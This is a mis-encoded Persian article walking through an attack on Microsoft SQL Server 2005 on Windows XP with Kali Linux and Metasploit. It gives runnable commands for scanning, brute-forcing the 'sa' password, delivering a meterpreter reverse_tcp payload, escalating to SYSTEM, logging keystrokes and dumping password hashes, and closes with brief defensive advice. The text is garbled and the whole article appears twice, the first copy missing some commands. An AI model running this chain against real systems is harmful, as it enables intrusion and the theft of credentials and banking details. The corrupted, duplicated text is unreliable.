Øمله به SQL Server Ùˆ در اختیار گرÙتن کنترل سامانه
بسیاری از مدیران سامانه ها Ùˆ پایگاه های داده بر این باورند وقتی صØبت از اس کیوال سرور به میان Ù…ÛŒ آید پیچیدگی گذرواژه چندان اÙاقه نمی کند.
اخیراً Ù…Øققان از یک نسخه ÛŒ استاندارد لینوکس به نام کالی لینوکس Ùˆ چارچوب متااسپلویت از پیش نصب شده ÛŒ آن برای صورت دادن یک سری Øملات استÙاده کرده اند. اهدا٠آن ها رایانه ای با سامانه ÛŒ عامل XP بوده Ú©Ù‡ نسخه ای از مایکروساÙت اس کیو ال سرور Û²Û°Û°Ûµ را اجرا Ù…ÛŒ کرده است. Øملات این چنینی روی هر نوع بستر مجهز به مایکروساÙت اس کیوال سرور Ùˆ سامانه های عامل ویندوزی عملی هستند. زیرا ضع٠موجود در این سامانه ها همان قدرت گذرواژه است، نه خود Ù…Øیط.
توصی٠Øمله
مانند هر Øمله ÛŒ دیگری، در وهله ÛŒ اول Ù…ÛŒ بایست اطلاعاتی راجع به سامانه ÛŒ عامل مقصد به دست بیاید. یکی از گزینه های Ù…Ø·Ø±Ø Ø§Ø³ØªÙاده از NMAP برای پویش یک Ù…Øدوده ÛŒ مشخص از IPها برای یاÙتن پورت های استاندارد SQL است.
دستورات:
این متااسپلویت از پویش گر توکار mssql_ping نیز استÙاده Ù…ÛŒ کند. این پویش گر هرگونه کارگزار مایکروساÙت اس کیوال را در Ù…Øدوده های IP مشخص شناسایی Ù…ÛŒ کند.
دستورات:
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS 192.168.23.0/24 (our target IP range)
set THREADS 8
run
Øال Ú©Ù‡ سامانه ÛŒ هد٠مشخص شده (192.168.23.100) Ùˆ اطلاعاتی راجع به نسخه ÛŒ مایکروساÙت اس کیو ال سرور مورد استÙاده در آن به دست آمده (2005 SP4ØŒ پورت Û±Û´Û³Û³ TCP)ØŒ Ù…ÛŒ توان گام بعدی را آغاز کرد.
Øمله
این Øمله بر مبنای یک اصل ساده استوار است. در اغلب موارد مایکروساÙت اس کیوال سرور در یک Øالت ترکیبی نصب Ù…ÛŒ شود. کاربر پیش Ùرض اس کیو ال سرور در این Øالت «sa» است. در اکثر اوقات گذرواژه ÛŒ ساده ای برای این کاربر استÙاده Ù…ÛŒ شود. بدین معنا Ú©Ù‡ انجام یک جست وجوی Ùراگیر به Ú©Ù…Ú© یک پرونده ÛŒ واژه نامه برای یاÙتن چنین گذرواژه ای کار سختی نیست. این پرونده های واژه نامه را Ù…ÛŒ توان بارگیری یا تولید کرد.
مزایای تولید یک Ùهرست سÙارشی این است Ú©Ù‡ امکان اضاÙÙ‡ نمودن دستی واژگان دیگر مانند اسامی نرم اÙزارها Ùˆ یا شرکت ها توسط برخی از ابزارها مهیا Ù…ÛŒ شود. این ویژگی Ù…ÛŒ تواند گذرواژه ای همچون «Sandstone01» را برای نسخه های از اس کیو ال Ú©Ù‡ پایگاه داده ÛŒ نرم اÙزار «Sandstone» را اجرا Ù…ÛŒ کنند، تØت پوشش قرار دهد. برای این Øمله از ابزار توکار MSSQL_Login استÙاده شده است. پس از مشخص کردن هد٠و پرونده ÛŒ گذرواژه، Øمله ÛŒ واژه نامه شروع Ù…ÛŒ شود.
دستورات:
use auxiliary/scanner/mssql/mssql_login
Set PASS_FILE /root/passwords.txt (the dictionary file)
Set RHOSTS 192.168.23.100
Set Threads 8
Set verbose false
run
چنانچه این گام Øمله با موÙقیت همراه باشد، گذرواژه ÛŒ SA پیدا خواهد شد. این گذرواژه به خودی خود Ù…ÛŒ تواند قطعه ÛŒ اطلاعاتی ارزش مندی باشد Ú©Ù‡ امکان دست کاری پایگاه داده را Ùراهم Ù…ÛŒ کند. پژوهش گران در Øمله ÛŒ مورد نظر از Øساب کاربری SA برای دسترسی به سامانه ÛŒ عامل ویندوز٠در Øال اجرا استÙاده کرده اند.
Ù†Øوه ÛŒ اجرای کد مخرب
Øال پژوهش گران Ù…ÛŒ توانند از این گذرواژه ÛŒ SA برای برقراری اتصال به هد٠استÙاده کنند. کالی لینوکس دارای ابزار تعبیه شده ای به نام mssql_payload است. این ابزار به Ù…Øققان اجازه Ù…ÛŒ دهد یک کد مخرب را به Ú©Ù…Ú© اطلاعات Ù…Øرمانه ÛŒ جدید از طریق پورت Û±Û´Û³Û³ ارسال نمایند. در ادامه از این کد مخرب برای پیاده سازی یک جلسه ÛŒ کاری میان هد٠و عامل Øمله استÙاده Ù…ÛŒ شود.
دستورات:
use exploit/windows/mssql/mssql_payload
set RHOST 192.168.23.100 (our target)
set password Password01 (which we have just cracked)
use payload/windows/meterpreter/reverse_tcp (our selected payload)
Exploit
در اینجا قسمت سرگرم کننده ÛŒ ماجرا آغاز Ù…ÛŒ شود. جلسه ÛŒ کاری در هد٠آغاز به کار Ù…ÛŒ کند Ùˆ به این ترتیب دست پژوهش گران برای انتخاب دستورات بی شماری باز Ù…ÛŒ شود. به خاطر داشته باشید Ú©Ù‡ ضدبداÙزارهای بسیاری قادرند پرونده های Meterpreter را بعد از نصب در رایانه ÛŒ هد٠شناسایی Ùˆ Øذ٠کنند. با این Øال از روی سوابق Ùˆ تجربیات Ù…ÛŒ توان Ú¯Ùت Ú©Ù‡ خیل عظیمی از مدیران اس کیو ال سرور برای دست یابی به Øداکثر کارایی در پایگاه داده ای Ú©Ù‡ توسط کارگزار مورد نظرشان میزبانی Ù…ÛŒ شود، هرگونه پویش هنگام٠دسترسی را غیرÙعال Ù…ÛŒ کنند. اگر هد٠ضدبداÙزار خود را به طور مثال Ùقط در طول شب Ùعال کند، مدت زمان Ùراوانی را برای Øمله Ùˆ به Ú†Ù†Ú¯ آوردن اطلاعات سامانه در اختیار مهاجمان قرار Ù…ÛŒ دهد Ùˆ به آن ها اجازه Ù…ÛŒ دهد Ú¯Ù… نام باقی بمانند.
به جای استÙاده از کد مخرب Meterpreter Ù…ÛŒ توان از Ù…Øتوای مخرب دیگری هم Ú©Ù…Ú© گرÙت. برای این کار کاÙÛŒ است دستورات Ùوق را اجرا کرد، تنها Ù…ÛŒ بایست نام کد مخرب را تغییر داد. مثلاً کد مخرب «generic/shell_bind_tcp» Ù…ÛŒ تواند به رابط خط Ùرمان سامانه ÛŒ مقصد دست پیدا کند.
تشدید امتیازها
برای اجرای بسیاری از این دستورها لازم است Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ کاربری اÙزایش پیدا کند. برای دسترسی به امتیازهای مدیریتی Ù…ÛŒ بایست ابزارهایی نظیر Ú©ÛŒ لاگر Ùˆ نر Ù… اÙزارهایی را Ú©Ù‡ برای تهیه ÛŒ اسکرین شات یا استخراج گذرواژه به کار Ù…ÛŒ روند استÙاده کرد.
این کار با پوسته ÛŒ Meterpreter آسان است. نخست با دستور «ps» Ùهرستی از Ùرآیندهای در Øال اجرا ایجاد Ù…ÛŒ شود. سپس Ù…ÛŒ توان از دستور «migrate» به Ùرآیندی رÙت Ú©Ù‡ Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ بالاتری نیاز دارد. در این مورد Ùرآیندی با ویژگی مذکور explorer.exe Ù…ÛŒ باشد.
در این مرØله به یک دستور دیگر برای استÙاده نیاز است: getsystem. این دستور امکان دسترسی به سامانه ÛŒ meterpreter را به سامانه ای Ù…ÛŒ دهد Ú©Ù‡ با دستور migrate Ùراخوانی شده است. بدون این دستور در صورت اجرای Ùرآیند migrate با عبارت «امتیاز ناکاÙی» مواجه خواهیم شد.
دستورات:
Ps (این دستور Ùرآیندهای در Øال اجرا را به همراه Ù¾ÛŒ Ø¢ÛŒ دی های آن ها نشان خواهد داد)
Getsystem (برای دسترسی به امتیازهای سامانه)
Migrate 1064 (explorer.exe PID در این مثال)
جمع آوری اطلاعات
Øال Ú©Ù‡ به طور کامل به سامانه دسترسی پیدا کرده ایم، Ù…ÛŒ توانیم از ابزارهای دیگری برای جمع آوری اطلاعاتی Ú©Ù‡ نیاز داریم استÙاده کنیم:
دستورات:
این دستور به تهیه ÛŒ اسکرین شات از هد٠و ذخیره ÛŒ آن در قالب یک پرونده ÛŒ jpeg در سامانه ÛŒ Ù…ØÙ„ÛŒ منجر Ù…ÛŒ شود.
دستورات:
این دستور باعث اجرای یک Ú©ÛŒ لاگر در سامانه ÛŒ هد٠و ذخیره ÛŒ متن ثبت شده در یک پرونده ÛŒ موجود در سامانه ÛŒ Ù…ØÙ„ÛŒ Ù…ÛŒ شود. این Ú©ÛŒ لاگر را Ù…ÛŒ توان برای به دست آوردن جزئیات ورود به صÙØات وب، Øساب های کاربری بانکی Ùˆ اطلاعات کارت اعتباری استÙاده کرد. با وجود این چندان جای نگرانی وجود ندارد. زیرا بسیاری از برنامه های ضدبداÙزاری Ù…ÛŒ توانند به راØتی این Ú©ÛŒ لاگر را شناسایی کنند.
دستورات:
Migrate 772 (services.exe برای PID)
Run post/windows/gather/hashdump
گذرواژه های کاربران اغلب به صورت عبارت های درهم یک طرÙÙ‡ ذخیره Ù…ÛŒ شوند. این عبارات درهم را Ù…ÛŒ توان به Ú©Ù…Ú© Øملات جست وجوی Ùراگیر پیشرÙته Ùˆ یا Øملات پیچیده تر مانند Øمله ÛŒ واژه نامه یا جدول رنگین کمان3 کش٠رمز کرد.
برای به دست آوردن مقادیر درهم از سامانه ÛŒ هد٠می بایست به Ùرآیند services.exe مهاجرت کرد تا به این طریق بتوان به یک Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ مناسب رسید.
این مقادیر را Ù…ÛŒ توان در بسیاری از ابزارهای جست وجوی Ùراگیر گذرواژه مانند Ophcrack Ùˆ Hashcat به کار گرÙت.
نتیجه
Ù…Øققان ضمن پیمودن این چند گام توانسته اند هرگونه دیوار آتش اØتمالی را با استÙاده از یک پورت باز اس کیوال سرور دور بزنند Ùˆ به پایگاه داده دسترسی کامل پیدا کنند، سپس از این امکان برای دسترسی کامل به سامانه ÛŒ عامل نمایند. به این ترتیب متوجه شدیم Ú©Ù‡ به Ú©Ù…Ú© Ú©ÛŒ لاگر Ùˆ گذرواژه های استخراج شده از عبارت های درهم Ù…ÛŒ توان جزئیات سودمندتری مانند شناسه Ùˆ گذرواژه را برای دستیابی به سایر سامانه ها به دست آورد.
چگونگی رویارویی با این Øمله
چندین گزینه برای Ù…ØاÙظت از سامانه مقابل این Øمله وجود دارد. در وهله ÛŒ اول: استÙاده از گذرواژه ÛŒ مناسب! اس کیو ال سرور هرگز نباید از گذرواژه ÛŒ پیش پا اÙتاد Ù‡ ای مانند SA استÙاده کند،
گذرواژه ÛŒ ساده ای Ú©Ù‡ به سهولت Ù…ÛŒ توان آن را با Øملات جست وجوی Ùراگیر Ùˆ با تلاشی اندک به دست آورد. جدا از این ها، با یک سامانه ÛŒ تشخیص Ù†Ùوذ یا نظارت بر گزارش عمل کردها به طور خودکار یا دستی Ù…ÛŒ توان Øملات جست وجوی Ùراگیر را از روی تلاش های ناموÙÙ‚ بی شمار برای ورود به سامانه کش٠کرد. یکی دیگر از راه کارهای مقابله با Øمله اجرای یک پویش ضدبداÙزاری است. در این مثال، کد مخرب شناسایی شده Ùˆ پاک Ù…ÛŒ شود Ùˆ یا پیش از آسیب وارد کردن به هر اطلاعاتی راه آن سد Ù…ÛŒ شود.
منبع +
بسیاری از مدیران سامانه ها Ùˆ پایگاه های داده بر این باورند وقتی صØبت از اس کیوال سرور به میان Ù…ÛŒ آید پیچیدگی گذرواژه چندان اÙاقه نمی کند.
اخیراً Ù…Øققان از یک نسخه ÛŒ استاندارد لینوکس به نام کالی لینوکس Ùˆ چارچوب متااسپلویت از پیش نصب شده ÛŒ آن برای صورت دادن یک سری Øملات استÙاده کرده اند. اهدا٠آن ها رایانه ای با سامانه ÛŒ عامل XP بوده Ú©Ù‡ نسخه ای از مایکروساÙت اس کیو ال سرور Û²Û°Û°Ûµ را اجرا Ù…ÛŒ کرده است. Øملات این چنینی روی هر نوع بستر مجهز به مایکروساÙت اس کیوال سرور Ùˆ سامانه های عامل ویندوزی عملی هستند. زیرا ضع٠موجود در این سامانه ها همان قدرت گذرواژه است، نه خود Ù…Øیط.
توصی٠Øمله
مانند هر Øمله ÛŒ دیگری، در وهله ÛŒ اول Ù…ÛŒ بایست اطلاعاتی راجع به سامانه ÛŒ عامل مقصد به دست بیاید. یکی از گزینه های Ù…Ø·Ø±Ø Ø§Ø³ØªÙاده از NMAP برای پویش یک Ù…Øدوده ÛŒ مشخص از IPها برای یاÙتن پورت های استاندارد SQL است.
دستورات:
Nmap –sT –A –PO 192.168.23.0/24
این متااسپلویت از پویش گر توکار mssql_ping نیز استÙاده Ù…ÛŒ کند. این پویش گر هرگونه کارگزار مایکروساÙت اس کیوال را در Ù…Øدوده های IP مشخص شناسایی Ù…ÛŒ کند.
دستورات:
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS 192.168.23.0/24 (our target IP range)
set THREADS 8
run
Øال Ú©Ù‡ سامانه ÛŒ هد٠مشخص شده (192.168.23.100) Ùˆ اطلاعاتی راجع به نسخه ÛŒ مایکروساÙت اس کیو ال سرور مورد استÙاده در آن به دست آمده (2005 SP4ØŒ پورت Û±Û´Û³Û³ TCP)ØŒ Ù…ÛŒ توان گام بعدی را آغاز کرد.
Øمله
این Øمله بر مبنای یک اصل ساده استوار است. در اغلب موارد مایکروساÙت اس کیوال سرور در یک Øالت ترکیبی نصب Ù…ÛŒ شود. کاربر پیش Ùرض اس کیو ال سرور در این Øالت «sa» است. در اکثر اوقات گذرواژه ÛŒ ساده ای برای این کاربر استÙاده Ù…ÛŒ شود. بدین معنا Ú©Ù‡ انجام یک جست وجوی Ùراگیر به Ú©Ù…Ú© یک پرونده ÛŒ واژه نامه برای یاÙتن چنین گذرواژه ای کار سختی نیست. این پرونده های واژه نامه را Ù…ÛŒ توان بارگیری یا تولید کرد.
مزایای تولید یک Ùهرست سÙارشی این است Ú©Ù‡ امکان اضاÙÙ‡ نمودن دستی واژگان دیگر مانند اسامی نرم اÙزارها Ùˆ یا شرکت ها توسط برخی از ابزارها مهیا Ù…ÛŒ شود. این ویژگی Ù…ÛŒ تواند گذرواژه ای همچون «Sandstone01» را برای نسخه های از اس کیو ال Ú©Ù‡ پایگاه داده ÛŒ نرم اÙزار «Sandstone» را اجرا Ù…ÛŒ کنند، تØت پوشش قرار دهد. برای این Øمله از ابزار توکار MSSQL_Login استÙاده شده است. پس از مشخص کردن هد٠و پرونده ÛŒ گذرواژه، Øمله ÛŒ واژه نامه شروع Ù…ÛŒ شود.
دستورات:
use auxiliary/scanner/mssql/mssql_login
Set PASS_FILE /root/passwords.txt (the dictionary file)
Set RHOSTS 192.168.23.100
Set Threads 8
Set verbose false
run
چنانچه این گام Øمله با موÙقیت همراه باشد، گذرواژه ÛŒ SA پیدا خواهد شد. این گذرواژه به خودی خود Ù…ÛŒ تواند قطعه ÛŒ اطلاعاتی ارزش مندی باشد Ú©Ù‡ امکان دست کاری پایگاه داده را Ùراهم Ù…ÛŒ کند. پژوهش گران در Øمله ÛŒ مورد نظر از Øساب کاربری SA برای دسترسی به سامانه ÛŒ عامل ویندوز٠در Øال اجرا استÙاده کرده اند.
Ù†Øوه ÛŒ اجرای کد مخرب
Øال پژوهش گران Ù…ÛŒ توانند از این گذرواژه ÛŒ SA برای برقراری اتصال به هد٠استÙاده کنند. کالی لینوکس دارای ابزار تعبیه شده ای به نام mssql_payload است. این ابزار به Ù…Øققان اجازه Ù…ÛŒ دهد یک کد مخرب را به Ú©Ù…Ú© اطلاعات Ù…Øرمانه ÛŒ جدید از طریق پورت Û±Û´Û³Û³ ارسال نمایند. در ادامه از این کد مخرب برای پیاده سازی یک جلسه ÛŒ کاری میان هد٠و عامل Øمله استÙاده Ù…ÛŒ شود.
دستورات:
use exploit/windows/mssql/mssql_payload
set RHOST 192.168.23.100 (our target)
set password Password01 (which we have just cracked)
use payload/windows/meterpreter/reverse_tcp (our selected payload)
Exploit
در اینجا قسمت سرگرم کننده ÛŒ ماجرا آغاز Ù…ÛŒ شود. جلسه ÛŒ کاری در هد٠آغاز به کار Ù…ÛŒ کند Ùˆ به این ترتیب دست پژوهش گران برای انتخاب دستورات بی شماری باز Ù…ÛŒ شود. به خاطر داشته باشید Ú©Ù‡ ضدبداÙزارهای بسیاری قادرند پرونده های Meterpreter را بعد از نصب در رایانه ÛŒ هد٠شناسایی Ùˆ Øذ٠کنند. با این Øال از روی سوابق Ùˆ تجربیات Ù…ÛŒ توان Ú¯Ùت Ú©Ù‡ خیل عظیمی از مدیران اس کیو ال سرور برای دست یابی به Øداکثر کارایی در پایگاه داده ای Ú©Ù‡ توسط کارگزار مورد نظرشان میزبانی Ù…ÛŒ شود، هرگونه پویش هنگام٠دسترسی را غیرÙعال Ù…ÛŒ کنند. اگر هد٠ضدبداÙزار خود را به طور مثال Ùقط در طول شب Ùعال کند، مدت زمان Ùراوانی را برای Øمله Ùˆ به Ú†Ù†Ú¯ آوردن اطلاعات سامانه در اختیار مهاجمان قرار Ù…ÛŒ دهد Ùˆ به آن ها اجازه Ù…ÛŒ دهد Ú¯Ù… نام باقی بمانند.
به جای استÙاده از کد مخرب Meterpreter Ù…ÛŒ توان از Ù…Øتوای مخرب دیگری هم Ú©Ù…Ú© گرÙت. برای این کار کاÙÛŒ است دستورات Ùوق را اجرا کرد، تنها Ù…ÛŒ بایست نام کد مخرب را تغییر داد. مثلاً کد مخرب «generic/shell_bind_tcp» Ù…ÛŒ تواند به رابط خط Ùرمان سامانه ÛŒ مقصد دست پیدا کند.
تشدید امتیازها
برای اجرای بسیاری از این دستورها لازم است Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ کاربری اÙزایش پیدا کند. برای دسترسی به امتیازهای مدیریتی Ù…ÛŒ بایست ابزارهایی نظیر Ú©ÛŒ لاگر Ùˆ نر Ù… اÙزارهایی را Ú©Ù‡ برای تهیه ÛŒ اسکرین شات یا استخراج گذرواژه به کار Ù…ÛŒ روند استÙاده کرد.
این کار با پوسته ÛŒ Meterpreter آسان است. نخست با دستور «ps» Ùهرستی از Ùرآیندهای در Øال اجرا ایجاد Ù…ÛŒ شود. سپس Ù…ÛŒ توان از دستور «migrate» به Ùرآیندی رÙت Ú©Ù‡ Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ بالاتری نیاز دارد. در این مورد Ùرآیندی با ویژگی مذکور explorer.exe Ù…ÛŒ باشد.
در این مرØله به یک دستور دیگر برای استÙاده نیاز است: getsystem. این دستور امکان دسترسی به سامانه ÛŒ meterpreter را به سامانه ای Ù…ÛŒ دهد Ú©Ù‡ با دستور migrate Ùراخوانی شده است. بدون این دستور در صورت اجرای Ùرآیند migrate با عبارت «امتیاز ناکاÙی» مواجه خواهیم شد.
دستورات:
Ps (این دستور Ùرآیندهای در Øال اجرا را به همراه Ù¾ÛŒ Ø¢ÛŒ دی های آن ها نشان خواهد داد)
Getsystem (برای دسترسی به امتیازهای سامانه)
Migrate 1064 (explorer.exe PID در این مثال)
جمع آوری اطلاعات
Øال Ú©Ù‡ به طور کامل به سامانه دسترسی پیدا کرده ایم، Ù…ÛŒ توانیم از ابزارهای دیگری برای جمع آوری اطلاعاتی Ú©Ù‡ نیاز داریم استÙاده کنیم:
دستورات:
Screenshot
این دستور به تهیه ÛŒ اسکرین شات از هد٠و ذخیره ÛŒ آن در قالب یک پرونده ÛŒ jpeg در سامانه ÛŒ Ù…ØÙ„ÛŒ منجر Ù…ÛŒ شود.
دستورات:
Run post/windows/capture/keylog_recorder
این دستور باعث اجرای یک Ú©ÛŒ لاگر در سامانه ÛŒ هد٠و ذخیره ÛŒ متن ثبت شده در یک پرونده ÛŒ موجود در سامانه ÛŒ Ù…ØÙ„ÛŒ Ù…ÛŒ شود. این Ú©ÛŒ لاگر را Ù…ÛŒ توان برای به دست آوردن جزئیات ورود به صÙØات وب، Øساب های کاربری بانکی Ùˆ اطلاعات کارت اعتباری استÙاده کرد. با وجود این چندان جای نگرانی وجود ندارد. زیرا بسیاری از برنامه های ضدبداÙزاری Ù…ÛŒ توانند به راØتی این Ú©ÛŒ لاگر را شناسایی کنند.
دستورات:
Migrate 772 (services.exe برای PID)
Run post/windows/gather/hashdump
گذرواژه های کاربران اغلب به صورت عبارت های درهم یک طرÙÙ‡ ذخیره Ù…ÛŒ شوند. این عبارات درهم را Ù…ÛŒ توان به Ú©Ù…Ú© Øملات جست وجوی Ùراگیر پیشرÙته Ùˆ یا Øملات پیچیده تر مانند Øمله ÛŒ واژه نامه یا جدول رنگین کمان3 کش٠رمز کرد.
برای به دست آوردن مقادیر درهم از سامانه ÛŒ هد٠می بایست به Ùرآیند services.exe مهاجرت کرد تا به این طریق بتوان به یک Ø³Ø·Ø Ø¯Ø³ØªØ±Ø³ÛŒ مناسب رسید.
این مقادیر را Ù…ÛŒ توان در بسیاری از ابزارهای جست وجوی Ùراگیر گذرواژه مانند Ophcrack Ùˆ Hashcat به کار گرÙت.
نتیجه
Ù…Øققان ضمن پیمودن این چند گام توانسته اند هرگونه دیوار آتش اØتمالی را با استÙاده از یک پورت باز اس کیوال سرور دور بزنند Ùˆ به پایگاه داده دسترسی کامل پیدا کنند، سپس از این امکان برای دسترسی کامل به سامانه ÛŒ عامل نمایند. به این ترتیب متوجه شدیم Ú©Ù‡ به Ú©Ù…Ú© Ú©ÛŒ لاگر Ùˆ گذرواژه های استخراج شده از عبارت های درهم Ù…ÛŒ توان جزئیات سودمندتری مانند شناسه Ùˆ گذرواژه را برای دستیابی به سایر سامانه ها به دست آورد.
چگونگی رویارویی با این Øمله
چندین گزینه برای Ù…ØاÙظت از سامانه مقابل این Øمله وجود دارد. در وهله ÛŒ اول: استÙاده از گذرواژه ÛŒ مناسب! اس کیو ال سرور هرگز نباید از گذرواژه ÛŒ پیش پا اÙتاد Ù‡ ای مانند SA استÙاده کند،
گذرواژه ÛŒ ساده ای Ú©Ù‡ به سهولت Ù…ÛŒ توان آن را با Øملات جست وجوی Ùراگیر Ùˆ با تلاشی اندک به دست آورد. جدا از این ها، با یک سامانه ÛŒ تشخیص Ù†Ùوذ یا نظارت بر گزارش عمل کردها به طور خودکار یا دستی Ù…ÛŒ توان Øملات جست وجوی Ùراگیر را از روی تلاش های ناموÙÙ‚ بی شمار برای ورود به سامانه کش٠کرد. یکی دیگر از راه کارهای مقابله با Øمله اجرای یک پویش ضدبداÙزاری است. در این مثال، کد مخرب شناسایی شده Ùˆ پاک Ù…ÛŒ شود Ùˆ یا پیش از آسیب وارد کردن به هر اطلاعاتی راه آن سد Ù…ÛŒ شود.
منبع +